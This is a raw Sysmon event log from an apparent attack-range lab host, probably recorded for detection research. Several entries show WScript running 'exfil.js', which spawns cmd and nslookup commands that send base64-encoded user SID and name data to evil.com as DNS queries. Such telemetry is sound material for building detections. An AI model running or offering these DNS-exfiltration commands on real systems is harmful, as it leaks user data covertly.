14:21:32.460{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-BD43-000000005F02}7532C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.460{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.460{2E1864BB-18E0-629A-6742-000000005F02}39762636C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-BD43-000000005F02}7532C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.461{2E1864BB-18EC-629A-BD43-000000005F02}7532C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrkyn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.444{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvge.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.413{2E1864BB-18EC-629A-BB43-000000005F02}56283636C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-BC43-000000005F02}4728C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.397{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-BC43-000000005F02}4728C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.397{2E1864BB-18EC-629A-BA43-000000005F02}36565484C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-BC43-000000005F02}4728C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.408{2E1864BB-18EC-629A-BC43-000000005F02}4728C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-BA43-000000005F02}3656C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvge.tmp 2>&1 10341000x8000000000000000209165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.381{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-BB43-000000005F02}5628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.381{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-BB43-000000005F02}5628C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.381{2E1864BB-18EC-629A-BB43-000000005F02}56283636C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-BA43-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-BB43-000000005F02}5628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-BA43-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-18E0-629A-6742-000000005F02}3976896C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-BA43-000000005F02}3656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.367{2E1864BB-18EC-629A-BA43-000000005F02}3656C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvge.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.360{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvgfq.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.329{2E1864BB-18EC-629A-B843-000000005F02}3885200C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B943-000000005F02}6032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 